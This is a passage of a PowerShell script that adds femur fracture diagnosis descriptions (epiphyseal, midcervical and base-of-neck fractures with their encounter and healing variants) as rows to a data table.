femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of epiphysis (separation) (upper) of unspecified femur","Displaced fracture of epiphysis (separation) (upper) of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of right femur","Nondisplaced fracture of epiphysis (separation) (upper) of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of left femur","Nondisplaced fracture of epiphysis (separation) (upper) of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur","Nondisplaced fracture of epiphysis (separation) (upper) of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of right femur","Displaced midcervical fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of left femur","Displaced midcervical fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced midcervical fracture of unspecified femur","Displaced midcervical fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of right femur","Nondisplaced midcervical fracture of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of left femur","Nondisplaced midcervical fracture of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced midcervical fracture of unspecified femur","Nondisplaced midcervical fracture of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of right femur","Displaced fracture of base of neck of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of base of neck of left femur","Displaced fracture of base of neck of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with 